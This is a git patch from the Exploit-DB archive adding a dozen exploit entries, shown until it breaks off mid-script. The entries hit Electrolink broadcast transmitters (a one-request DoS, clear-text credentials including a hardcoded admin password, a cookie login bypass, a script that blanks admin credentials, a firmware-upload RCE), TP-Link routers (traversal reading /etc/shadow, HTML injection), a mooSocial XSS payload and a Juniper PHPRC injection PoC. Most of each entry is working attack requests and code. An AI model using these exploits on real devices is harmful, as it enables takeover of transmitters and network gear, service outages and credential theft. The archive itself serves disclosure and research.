From 81ae91fdae912a30b4448d35434d4ebfd4ac5b1a Mon Sep 17 00:00:00 2001 
From: Exploit-DB Date: Sat, 3 Feb 2024 00:16:34 +0000 Subject: [PATCH] DB: 2024-02-03 14 changes to exploits/shellcodes/ghdb Electrolink FM/DAB/TV Transmitter - Unauthenticated Remote DoS Electrolink FM/DAB/TV Transmitter (controlloLogin.js) - Credentials Disclosure Electrolink FM/DAB/TV Transmitter (Login Cookie) - Authentication Bypass Electrolink FM/DAB/TV Transmitter (login.htm/mail.htm) - Credentials Disclosure Electrolink FM/DAB/TV Transmitter - Pre-Auth MPFS Image Remote Code Execution Electrolink FM/DAB/TV Transmitter - Remote Authentication Removal TP-LINK TL-WR740N - Multiple HTML Injection TP-Link TL-WR740N - UnAuthenticated Directory Transversal Juniper-SRX-Firewalls&EX-switches - (PreAuth-RCE) (PoC) mooSocial 3.1.8 - Cross-Site Scripting (XSS) on User Login Page PCMan FTP Server 2.0 - 'pwd' Remote Buffer Overflow WebCatalog 48.4 - Arbitrary Protocol Execution --- exploits/hardware/dos/51774.txt | 82 ++++++++++++++++ exploits/hardware/webapps/51768.txt | 56 +++++++++++ exploits/hardware/webapps/51769.txt | 18 ++++ exploits/hardware/webapps/51770.txt | 83 ++++++++++++++++ exploits/hardware/webapps/51771.txt | 90 +++++++++++++++++ exploits/hardware/webapps/51772.txt | 77 +++++++++++++++ exploits/hardware/webapps/51773.py | 115 ++++++++++++++++++++++ exploits/hardware/webapps/51775.txt | 146 ++++++++++++++++++++++++++++ exploits/php/webapps/51766.txt | 31 ++++++ exploits/php/webapps/51776.py | 76 +++++++++++++++ exploits/windows/remote/51765.txt | 40 ++++++++ exploits/windows/remote/51767.py | 65 +++++++++++++ files_exploits.csv | 12 +++ ghdb.xml | 54 ++++++++++ 14 files changed, 945 insertions(+) create mode 100644 exploits/hardware/dos/51774.txt create mode 100644 exploits/hardware/webapps/51768.txt create mode 100644 exploits/hardware/webapps/51769.txt create mode 100644 exploits/hardware/webapps/51770.txt create mode 100644 exploits/hardware/webapps/51771.txt create mode 100644 exploits/hardware/webapps/51772.txt create mode 100755 
exploits/hardware/webapps/51773.py create mode 100644 exploits/hardware/webapps/51775.txt create mode 100644 exploits/php/webapps/51766.txt create mode 100755 exploits/php/webapps/51776.py create mode 100644 exploits/windows/remote/51765.txt create mode 100755 exploits/windows/remote/51767.py diff --git a/exploits/hardware/dos/51774.txt b/exploits/hardware/dos/51774.txt new file mode 100644 index 0000000000..e05e7f8663 --- /dev/null +++ b/exploits/hardware/dos/51774.txt 
@@ -0,0 +1,82 @@ +Electrolink FM/DAB/TV Transmitter Unauthenticated Remote DoS + + +Vendor: Electrolink s.r.l. +Product web page: https://www.electrolink.com +Affected version: 10W, 100W, 250W, Compact DAB Transmitter + 500W, 1kW, 2kW Medium DAB Transmitter + 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter + 100W, 500W, 1kW, 2kW Compact FM Transmitter + 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter + 15W - 40kW Digital FM Transmitter + BI, BIII VHF TV Transmitter + 10W - 5kW UHF TV Transmitter + Web version: 01.09, 01.08, 01.07 + Display version: 1.4, 1.2 + Control unit version: 01.06, 01.04, 01.03 + Firmware version: 2.1 + +Summary: Since 1990 Electrolink has been dealing with design and +manufacturing of advanced technologies for radio and television +broadcasting. The most comprehensive products range includes: FM +Transmitters, DAB Transmitters, TV Transmitters for analogue and +digital multistandard operation, Bandpass Filters (FM, DAB, ATV, +DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial +switches, Manual patch panels, RF power meters, Rigid line and +accessories. A professional solution that meets broadcasters needs +from small community television or radio to big government networks. + +Compact DAB Transmitters 10W, 100W and 250W models with 3.5" +touch-screen display and in-built state of the art DAB modulator, +EDI input and GPS receiver. All transmitters are equipped with a +state-of-the art DAB modulator with excellent performances, +self-protected and self-controlled amplifiers ensure trouble-free +non-stop operation. + +100W, 500W, 1kW and 2kW power range available on compact 2U and +3U 19" frame. Built-in stereo coder, touch screen display and +efficient low noise air cooling system. Available models: 3kW, +5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters +with fully broadband solid state amplifiers and an efficient +low-noise air cooling system. 
+ +FM digital modulator with excellent specifications, built-in +stereo and RDS coder. Digital deviation limiter together with +ASI and SDI inputs are available. These transmitters are ready +for ISOFREQUENCY networks. + +Available for VHF BI and VHF BIII operation with robust desing +and user-friendly local and remote control. Multi-standard UHF +TV transmitters from 10W up to 5kW with efficient low noise air +cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC +and ISDB-Tb available. + +Desc: The transmitter is suffering from a Denial of Service (DoS) +scenario. An unauthenticated attacker can reset the board as well +as stop the transmitter operations by sending one GET request to +the command.cgi gateway. + +Tested on: Mbedthis-Appweb/12.5.0 + Mbedthis-Appweb/12.0.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +Macedonian Information Security Research & Development Laboratory +Zero Science Lab - https://www.zeroscience.mk - @zeroscience + + +Advisory ID: ZSL-2023-5795 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5795.php + + +30.06.2023 + +-- + + +C:\>curl -s http://192.168.150.77:8888/command.cgi?web=r (reset board) +Success! OK +C:\>curl -s http://192.168.150.77:8888/command.cgi?web=K (stop) +Success! OK +C:\>curl -s http://192.168.150.77:8888/command.cgi?web=J (start) +Success! OK \ No newline at end of file diff --git a/exploits/hardware/webapps/51768.txt b/exploits/hardware/webapps/51768.txt new file mode 100644 index 0000000000..7f1addd1d8 --- /dev/null +++ b/exploits/hardware/webapps/51768.txt 
@@ -0,0 +1,56 @@ +# Exploit Title: TP-Link TL-WR740N UnAuthenticated Directory Transversal +# Date: 25/9/2023 +# Exploit Author: Syed Affan Ahmed (ZEROXINN) +# Vendor Homepage: http://www.tp-link.com +# Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n +# Tested on: TP-Link TL-WR740N + +---------------------------POC--------------------------- + +Request +------- + +GET /help/../../../etc/shadow HTTP/1.1 +Host: 192.168.0.1:8082 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: ipaddr=192.168.0.100; mLangage=žée; exception=4 +Connection: close + +Response +-------- + +HTTP/1.1 200 OK +Server: Router Webserver +Connection: close +WWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Router WR740N" +Content-Type: text/html + + + +TL-WR740N + + + + +root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7::: +Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7::: +bin::10933:0:99999:7::: +daemon::10933:0:99999:7::: +adm::10933:0:99999:7::: +lp:*:10933:0:99999:7::: +sync:*:10933:0:99999:7::: +shutdown:*:10933:0:99999:7::: +halt:*:10933:0:99999:7::: +uucp:*:10933:0:99999:7::: +operator:*:10933:0:99999:7::: +nobody::10933:0:99999:7::: +ap71::10933:0:99999:7::: \ No newline at end of file diff --git a/exploits/hardware/webapps/51769.txt b/exploits/hardware/webapps/51769.txt new file mode 100644 index 0000000000..befec3adb1 --- /dev/null +++ b/exploits/hardware/webapps/51769.txt 
@@ -0,0 +1,18 @@ +# Exploit Title: TP-LINK TL-WR740N - Multiple HTML Injection Vulnerabilities +# Date: 25/9/2023 +# Exploit Author: Shujaat Amin (ZEROXINN) +# Vendor Homepage: http://www.tp-link.com +# Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n +# Tested on: Windows 10 + +---------------------------POC----------------------------- + +1) Go to your routers IP (192.168.0.1) + +2) Go to Access control --> Target,rule + +3) Click on add new + +5) Type

Hello

in Target Description box + +6) Click on Save, and now you can see html injection on the webpage \ No newline at end of file diff --git a/exploits/hardware/webapps/51770.txt b/exploits/hardware/webapps/51770.txt new file mode 100644 index 0000000000..6e1a5ac32c --- /dev/null +++ b/exploits/hardware/webapps/51770.txt 
@@ -0,0 +1,83 @@ +Electrolink FM/DAB/TV Transmitter (login.htm/mail.htm) Credentials Disclosure + + +Vendor: Electrolink s.r.l. +Product web page: https://www.electrolink.com +Affected version: 10W, 100W, 250W, Compact DAB Transmitter + 500W, 1kW, 2kW Medium DAB Transmitter + 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter + 100W, 500W, 1kW, 2kW Compact FM Transmitter + 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter + 15W - 40kW Digital FM Transmitter + BI, BIII VHF TV Transmitter + 10W - 5kW UHF TV Transmitter + Web version: 01.09, 01.08, 01.07 + Display version: 1.4, 1.2 + Control unit version: 01.06, 01.04, 01.03 + Firmware version: 2.1 + +Summary: Since 1990 Electrolink has been dealing with design and +manufacturing of advanced technologies for radio and television +broadcasting. The most comprehensive products range includes: FM +Transmitters, DAB Transmitters, TV Transmitters for analogue and +digital multistandard operation, Bandpass Filters (FM, DAB, ATV, +DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial +switches, Manual patch panels, RF power meters, Rigid line and +accessories. A professional solution that meets broadcasters needs +from small community television or radio to big government networks. + +Compact DAB Transmitters 10W, 100W and 250W models with 3.5" +touch-screen display and in-built state of the art DAB modulator, +EDI input and GPS receiver. All transmitters are equipped with a +state-of-the art DAB modulator with excellent performances, +self-protected and self-controlled amplifiers ensure trouble-free +non-stop operation. + +100W, 500W, 1kW and 2kW power range available on compact 2U and +3U 19" frame. Built-in stereo coder, touch screen display and +efficient low noise air cooling system. Available models: 3kW, +5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters +with fully broadband solid state amplifiers and an efficient +low-noise air cooling system. 
+ +FM digital modulator with excellent specifications, built-in +stereo and RDS coder. Digital deviation limiter together with +ASI and SDI inputs are available. These transmitters are ready +for ISOFREQUENCY networks. + +Available for VHF BI and VHF BIII operation with robust desing +and user-friendly local and remote control. Multi-standard UHF +TV transmitters from 10W up to 5kW with efficient low noise air +cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC +and ISDB-Tb available. + +Desc: The device is vulnerable to a disclosure of clear-text +credentials in login.htm and mail.htm that can allow security +bypass and system access. + +Tested on: Mbedthis-Appweb/12.5.0 + Mbedthis-Appweb/12.0.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +Macedonian Information Security Research & Development Laboratory +Zero Science Lab - https://www.zeroscience.mk - @zeroscience + + +Advisory ID: ZSL-2023-XXXX +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-xxxx.php + + +30.06.2023 + +-- + + +C:\>curl -s "http://192.168.150.77:8888/login.htm" | findstr /spina:d "passw" +55:Admin password +56: +63:Guest password +64: +C:\>curl -s http://192.168.150.77:8888/mail.htm | findstr /spina:d "passw" +93:Server password +94: \ No newline at end of file diff --git a/exploits/hardware/webapps/51771.txt b/exploits/hardware/webapps/51771.txt new file mode 100644 index 0000000000..465862a571 --- /dev/null +++ b/exploits/hardware/webapps/51771.txt 
@@ -0,0 +1,90 @@ +Electrolink FM/DAB/TV Transmitter (controlloLogin.js) Credentials Disclosure + + +Vendor: Electrolink s.r.l. +Product web page: https://www.electrolink.com +Affected version: 10W, 100W, 250W, Compact DAB Transmitter + 500W, 1kW, 2kW Medium DAB Transmitter + 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter + 100W, 500W, 1kW, 2kW Compact FM Transmitter + 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter + 15W - 40kW Digital FM Transmitter + BI, BIII VHF TV Transmitter + 10W - 5kW UHF TV Transmitter + Web version: 01.09, 01.08, 01.07 + Display version: 1.4, 1.2 + Control unit version: 01.06, 01.04, 01.03 + Firmware version: 2.1 + +Summary: Since 1990 Electrolink has been dealing with design and +manufacturing of advanced technologies for radio and television +broadcasting. The most comprehensive products range includes: FM +Transmitters, DAB Transmitters, TV Transmitters for analogue and +digital multistandard operation, Bandpass Filters (FM, DAB, ATV, +DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial +switches, Manual patch panels, RF power meters, Rigid line and +accessories. A professional solution that meets broadcasters needs +from small community television or radio to big government networks. + +Compact DAB Transmitters 10W, 100W and 250W models with 3.5" +touch-screen display and in-built state of the art DAB modulator, +EDI input and GPS receiver. All transmitters are equipped with a +state-of-the art DAB modulator with excellent performances, +self-protected and self-controlled amplifiers ensure trouble-free +non-stop operation. + +100W, 500W, 1kW and 2kW power range available on compact 2U and +3U 19" frame. Built-in stereo coder, touch screen display and +efficient low noise air cooling system. Available models: 3kW, +5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters +with fully broadband solid state amplifiers and an efficient +low-noise air cooling system. 
+ +FM digital modulator with excellent specifications, built-in +stereo and RDS coder. Digital deviation limiter together with +ASI and SDI inputs are available. These transmitters are ready +for ISOFREQUENCY networks. + +Available for VHF BI and VHF BIII operation with robust desing +and user-friendly local and remote control. Multi-standard UHF +TV transmitters from 10W up to 5kW with efficient low noise air +cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC +and ISDB-Tb available. + +Desc: The device is vulnerable to a disclosure of clear-text +credentials in controlloLogin.js that can allow security +bypass and system access. + +Tested on: Mbedthis-Appweb/12.5.0 + Mbedthis-Appweb/12.0.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +Macedonian Information Security Research & Development Laboratory +Zero Science Lab - https://www.zeroscience.mk - @zeroscience + + +Advisory ID: ZSL-2023-5790 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5790.php + + +30.06.2023 + +-- + + +C:\>curl -s "http://192.168.150.77:8888/controlloLogin.js" +function verifica() { + var user = document.getElementById('user').value; + var password = document.getElementById('password').value; + + //alert(user); + + if(user=='admin' && password=='cozzir'){ + SetCookie('Login','OK',exp); + window.location.replace("FrameSetCore.html"); + }else{ + SetCookie('Login','NO',exp); + window.location.replace("login.html"); + } +} \ No newline at end of file diff --git a/exploits/hardware/webapps/51772.txt b/exploits/hardware/webapps/51772.txt new file mode 100644 index 0000000000..02b4aea98f --- /dev/null +++ b/exploits/hardware/webapps/51772.txt 
@@ -0,0 +1,77 @@ +Electrolink FM/DAB/TV Transmitter (Login Cookie) Authentication Bypass + + +Vendor: Electrolink s.r.l. +Product web page: https://www.electrolink.com +Affected version: 10W, 100W, 250W, Compact DAB Transmitter + 500W, 1kW, 2kW Medium DAB Transmitter + 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter + 100W, 500W, 1kW, 2kW Compact FM Transmitter + 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter + 15W - 40kW Digital FM Transmitter + BI, BIII VHF TV Transmitter + 10W - 5kW UHF TV Transmitter + Web version: 01.09, 01.08, 01.07 + Display version: 1.4, 1.2 + Control unit version: 01.06, 01.04, 01.03 + Firmware version: 2.1 + +Summary: Since 1990 Electrolink has been dealing with design and +manufacturing of advanced technologies for radio and television +broadcasting. The most comprehensive products range includes: FM +Transmitters, DAB Transmitters, TV Transmitters for analogue and +digital multistandard operation, Bandpass Filters (FM, DAB, ATV, +DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial +switches, Manual patch panels, RF power meters, Rigid line and +accessories. A professional solution that meets broadcasters needs +from small community television or radio to big government networks. + +Compact DAB Transmitters 10W, 100W and 250W models with 3.5" +touch-screen display and in-built state of the art DAB modulator, +EDI input and GPS receiver. All transmitters are equipped with a +state-of-the art DAB modulator with excellent performances, +self-protected and self-controlled amplifiers ensure trouble-free +non-stop operation. + +100W, 500W, 1kW and 2kW power range available on compact 2U and +3U 19" frame. Built-in stereo coder, touch screen display and +efficient low noise air cooling system. Available models: 3kW, +5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters +with fully broadband solid state amplifiers and an efficient +low-noise air cooling system. 
+ +FM digital modulator with excellent specifications, built-in +stereo and RDS coder. Digital deviation limiter together with +ASI and SDI inputs are available. These transmitters are ready +for ISOFREQUENCY networks. + +Available for VHF BI and VHF BIII operation with robust desing +and user-friendly local and remote control. Multi-standard UHF +TV transmitters from 10W up to 5kW with efficient low noise air +cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC +and ISDB-Tb available. + +Desc: The transmitter is vulnerable to an authentication bypass +vulnerability affecting the Login Cookie. An attacker can set +an arbitrary value except 'NO' to the Login Cookie and have +full system access. + +Tested on: Mbedthis-Appweb/12.5.0 + Mbedthis-Appweb/12.0.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +Macedonian Information Security Research & Development Laboratory +Zero Science Lab - https://www.zeroscience.mk - @zeroscience + + +Advisory ID: ZSL-2023-5791 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5791.php + + +30.06.2023 + +-- + + +C:\>curl -s "http://192.168.150.77:8888/home.htm" -H "Cookie: Login=ADMIN" \ No newline at end of file diff --git a/exploits/hardware/webapps/51773.py b/exploits/hardware/webapps/51773.py new file mode 100755 index 0000000000..4ae59ecac4 --- /dev/null +++ b/exploits/hardware/webapps/51773.py 
@@ -0,0 +1,115 @@ +#!/usr/bin/env python +# +# +# Electrolink FM/DAB/TV Transmitter Remote Authentication Removal +# +# +# Vendor: Electrolink s.r.l. +# Product web page: https://www.electrolink.com +# Affected version: 10W, 100W, 250W, Compact DAB Transmitter +# 500W, 1kW, 2kW Medium DAB Transmitter +# 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter +# 100W, 500W, 1kW, 2kW Compact FM Transmitter +# 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter +# 15W - 40kW Digital FM Transmitter +# BI, BIII VHF TV Transmitter +# 10W - 5kW UHF TV Transmitter +# Web version: 01.09, 01.08, 01.07 +# Display version: 1.4, 1.2 +# Control unit version: 01.06, 01.04, 01.03 +# Firmware version: 2.1 +# +# Summary: Since 1990 Electrolink has been dealing with design and +# manufacturing of advanced technologies for radio and television +# broadcasting. The most comprehensive products range includes: FM +# Transmitters, DAB Transmitters, TV Transmitters for analogue and +# digital multistandard operation, Bandpass Filters (FM, DAB, ATV, +# DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial +# switches, Manual patch panels, RF power meters, Rigid line and +# accessories. A professional solution that meets broadcasters needs +# from small community television or radio to big government networks. +# +# Compact DAB Transmitters 10W, 100W and 250W models with 3.5" +# touch-screen display and in-built state of the art DAB modulator, +# EDI input and GPS receiver. All transmitters are equipped with a +# state-of-the art DAB modulator with excellent performances, +# self-protected and self-controlled amplifiers ensure trouble-free +# non-stop operation. +# +# 100W, 500W, 1kW and 2kW power range available on compact 2U and +# 3U 19" frame. Built-in stereo coder, touch screen display and +# efficient low noise air cooling system. Available models: 3kW, +# 5kW, 10kW, 15kW, 20kW and 30kW. 
High efficiency FM transmitters +# with fully broadband solid state amplifiers and an efficient +# low-noise air cooling system. +# +# FM digital modulator with excellent specifications, built-in +# stereo and RDS coder. Digital deviation limiter together with +# ASI and SDI inputs are available. These transmitters are ready +# for ISOFREQUENCY networks. +# +# Available for VHF BI and VHF BIII operation with robust desing +# and user-friendly local and remote control. Multi-standard UHF +# TV transmitters from 10W up to 5kW with efficient low noise air +# cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC +# and ISDB-Tb available. +# +# Desc: The application is vulnerable to an unauthenticated +# parameter manipulation that allows an attacker to set the +# credentials to blank giving her access to the admin panel. +# Also vulnerable to account takeover and arbitrary password +# change. +# +# Tested on: Mbedthis-Appweb/12.5.0 +# Mbedthis-Appweb/12.0.0 +# +# +# Vulnerability discovered by Neurogenesia +# Macedonian Information Security Research & Development Laboratory +# Zero Science Lab - https://www.zeroscience.mk - @zeroscience +# +# +# Advisory ID: ZSL-2023-5792 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5792.php +# +# +# 30.06.2023 +# +# + + +import datetime +import requests + +dt = datetime.datetime.now() +dt = dt.strftime('%d.%m.%Y %H:%M:%S') +nul = '' + +print('Starting transmitter exploit at', dt) + +ip = input('Enter transmitter ip: ') +if 'http' not in ip: + ip = 'http://' + ip + +ep = '/login.htm' +url = ip + ep + +signature = {'Accept-Encoding' : 'gzip, deflate', + 'Accept-Language' : 'ku-MK,en;q=0.1806', + 'User-Agent' : 'Broadcastso/B.B', + 'Connection' : 'keep-alive' + } +# ----------------- Line breaker v0.17 ----------------- +postd = { 'adminuser' : nul, + 'guestuser' : nul, + 'adminpassword' : nul, + 'guestpassword' : nul + } + +print('Removing security control...') +r = requests.post(url, data = postd, 
headers = signature) +if r.status_code == 200: + print('Done. Go and "Login".') +else: + print('Error') +exit(-4) \ No newline at end of file diff --git a/exploits/hardware/webapps/51775.txt b/exploits/hardware/webapps/51775.txt new file mode 100644 index 0000000000..863be7ba82 --- /dev/null +++ b/exploits/hardware/webapps/51775.txt 
@@ -0,0 +1,146 @@ +Electrolink FM/DAB/TV Transmitter Pre-Auth MPFS Image Remote Code Execution + + +Vendor: Electrolink s.r.l. +Product web page: https://www.electrolink.com +Affected version: 10W, 100W, 250W, Compact DAB Transmitter + 500W, 1kW, 2kW Medium DAB Transmitter + 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter + 100W, 500W, 1kW, 2kW Compact FM Transmitter + 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter + 15W - 40kW Digital FM Transmitter + BI, BIII VHF TV Transmitter + 10W - 5kW UHF TV Transmitter + Web version: 01.09, 01.08, 01.07 + Display version: 1.4, 1.2 + Control unit version: 01.06, 01.04, 01.03 + Firmware version: 2.1 + +Summary: Since 1990 Electrolink has been dealing with design and +manufacturing of advanced technologies for radio and television +broadcasting. The most comprehensive products range includes: FM +Transmitters, DAB Transmitters, TV Transmitters for analogue and +digital multistandard operation, Bandpass Filters (FM, DAB, ATV, +DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial +switches, Manual patch panels, RF power meters, Rigid line and +accessories. A professional solution that meets broadcasters needs +from small community television or radio to big government networks. + +Compact DAB Transmitters 10W, 100W and 250W models with 3.5" +touch-screen display and in-built state of the art DAB modulator, +EDI input and GPS receiver. All transmitters are equipped with a +state-of-the art DAB modulator with excellent performances, +self-protected and self-controlled amplifiers ensure trouble-free +non-stop operation. + +100W, 500W, 1kW and 2kW power range available on compact 2U and +3U 19" frame. Built-in stereo coder, touch screen display and +efficient low noise air cooling system. Available models: 3kW, +5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters +with fully broadband solid state amplifiers and an efficient +low-noise air cooling system. 
+ +FM digital modulator with excellent specifications, built-in +stereo and RDS coder. Digital deviation limiter together with +ASI and SDI inputs are available. These transmitters are ready +for ISOFREQUENCY networks. + +Available for VHF BI and VHF BIII operation with robust desing +and user-friendly local and remote control. Multi-standard UHF +TV transmitters from 10W up to 5kW with efficient low noise air +cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC +and ISDB-Tb available. + +Desc: The device allows access to an unprotected endpoint that +allows MPFS File System binary image upload without authentication. +The MPFS2 file system module provides a light-weight read-only +file system that can be stored in external EEPROM, external +serial Flash, or internal Flash program memory. This file system +serves as the basis for the HTTP2 web server module, but is also +used by the SNMP module and is available to other applications +that require basic read-only storage capabilities. This can be +exploited to overwrite the flash program memory that holds the +web server's main interfaces and execute arbitrary code. 
+ +Tested on: Mbedthis-Appweb/12.5.0 + Mbedthis-Appweb/12.0.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +Macedonian Information Security Research & Development Laboratory +Zero Science Lab - https://www.zeroscience.mk - @zeroscience + + +Advisory ID: ZSL-2023-5796 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5796.php + +Ref: https://documentation.help/Microchip-TCP.IP-Stack/GS-MPFSUpload.html + +30.06.2023 + +-- + + +POST /upload HTTP/1.1 +Host: 192.168.150.77:8888 +Content-Length: 251 +Cache-Control: max-age=0 +Content-Type: multipart/form-data; boundary=----joxypoxy +User-Agent: MPFS2_PoC/1.0c +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: Login=IgnoreMePlsKtnx +Connection: close + +------joxypoxy +Content-Disposition: form-data; name="i"; filename="MPFSimg.bin" +Content-Type: application/octet-stream + +MPFS... +-----joxypoxy-- + + +HTTP/1.1 200 OK +Connection: close +Content-Type: text/html + +MPFS Update Successful

Site main page + + +--- + +hd htm: +0d 0a 4d 50 46 53 02 01 01 00 8a 43 20 00 00 00 MPFS.......C.... +2b 00 00 00 30 00 00 00 02 44 eb 64 00 00 00 00 +...0....D.d.... +00 00 69 6e 64 65 78 32 2e 68 74 6d 00 3c 68 74 ..index0.htm...ZSL< +... +... +64 6f 73 21 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 2d dos!..</html>..- + +--- + +MPFS Structure: + [M][P][F][S] + [BYTE Ver Hi][BYTE Ver Lo][WORD Number of Files] + [Name Hash 0][Name Hash 1]...[Name Hash N] + [File Record 0][File Record 1]...[File Record N] + [String 0][String 1]...[String N] + [File Data 0][File Data 1]...[File Data N] + + +--- + +C:\>javaw -jar MPFS2.jar +C:\>mpfs2 -v -l MPFSimg.bin +Version: 2.1 +Number of files: 1 (1 regular, 0 index) +Number of dynamic variables: 0 + +FileRecord 0: + .StringPtr = 32 index0.htm + .DataPtr = 43 + .Len = 48 + .Timestamp = 2023-08-27T14:39:30Z + .Flags = 0 \ No newline at end of file diff --git a/exploits/php/webapps/51766.txt b/exploits/php/webapps/51766.txt new file mode 100644 index 0000000000..323dc02e7a --- /dev/null +++ b/exploits/php/webapps/51766.txt 
@@ -0,0 +1,31 @@ +# Exploit Title: mooSocial 3.1.8 - Cross-Site Scripting (XSS) on User Login Page +# Date: 26 September 2023 +# Exploit Author: Astik Rawat (ahrixia) +# Vendor Homepage: https://moosocial.com +# Software Link: https://travel.moosocial.com/ +# Version: 3.1.8 +# Tested on: Windows 11 +# CVE : CVE-2023-43325 + + +Description: + +A Cross Site Scripting (XSS) vulnerability exists on the user login page in mooSocial which is a social network website. + +Steps to exploit: +1) Go to Login page on the website and login with credentials. +2) Insert your payload in the "data[redirect_url]" - POST Request + Proof of concept (Poc): + The following payload will allow you to execute XSS - + + Payload (Plain text): + test"><img src=a onerror=alert(1)>test + + Payload (Base64 encoded) : + dGVzdCI+PGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q= + + Final Payload (Base64+Url encoded): + dGVzdCI%2bPGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q%3d%3d + + POST Request on /moosocial/users/login (POST REQUEST DATA ONLY): + [_method=POST&data%5Bredirect_url%5D=dGVzdCI%2bPGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q%3d%3d&data%5BUser%5D%5Bid%5D=&data%5BUser%5D%5Bemail%5D=admin%40localhost.com&data%5BUser%5D%5Bpassword%5D=pas[redacted]&data%5Bremember%5D=0] \ No newline at end of file diff --git a/exploits/php/webapps/51776.py b/exploits/php/webapps/51776.py new file mode 100755 index 0000000000..b8bd2e07ae --- /dev/null +++ b/exploits/php/webapps/51776.py 
@@ -0,0 +1,76 @@ +# *************************************************************************************************** +# Exploit Title: juniper-SRX-Firewalls&EX-switches (PreAuth-RCE) (PoC) +# Description: +# +# This code serves as both a vulnerability detector and a proof of concept for CVE-2023-36845. +# It executes the phpinfo() function on the login page of the target device, +# allowing to inspect the PHP configuration. also this script has the option to save the phpinfo() +# output to a file for further analysis. +# +# Shodan Dork: http.favicon.hash:2141724739 +# Date: 2023/10/01 +# Exploit Author: whiteOwl (whiteowl.pub@gmail.com) +# Vendor Homepage: https://whiteowl-pub.github.io +# Version: Versions Prior to 20.4R3-S9,21.1R1,21.2R3-S7,21.3R3-S5, +# 21.4R3-S5,22.1R3-S4,22.2R3-S2,22.3R2-S2/R3-S1,22. +# 4R2-S1/R3,23.2R1-S1/R2 +# Tested on: JUNOS SM804122pri 15.1X49-D170.4 +# CVE : cve-2023-36845 +# *************************************************************************************************** + +import argparse +import requests + +banner = """ +************************************************************* +* CVE-2023-36845 Vulnerability Detector & Proof of concept * +* This script checks for the CVE-2023-36845 vulnerability * +* and run phpinfo() on vulnerable devices. * +* If you suspect a vulnerable system, please take action * +* immediately to secure it. 
* +* * +* Author: whiteowl * +************************************************************* +""" + +def send_request(url, output_file=None, verbose=False): + target_url = f"{url}/?PHPRC=/dev/fd/0" + data = 'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="' + + headers = { + 'User-Agent': 'Mozilla/5.0', + } + + try: + response = requests.post(target_url, headers=headers, data=data, stream=True) + if response.status_code == 200: + print("The Target Device is Vulnerable to: CVE-2023-36845") + else: + print("Not Vulnerable: Status Code", response.status_code) + + if output_file: + with open(output_file, 'w', encoding='utf-8') as file: + file.write(response.text) + + if verbose: + print(f"HTTP Status Code: {response.status_code}") + print("Response Headers:") + for header, value in response.headers.items(): + print(f"{header}: {value}") + print("Response Content:") + print(response.text) + except requests.exceptions.RequestException as e: + print(f"An error occurred: {e}") + +def main(): + print(banner) + parser = argparse.ArgumentParser(description="Custom curl-like script") + parser.add_argument("-u", "--url", 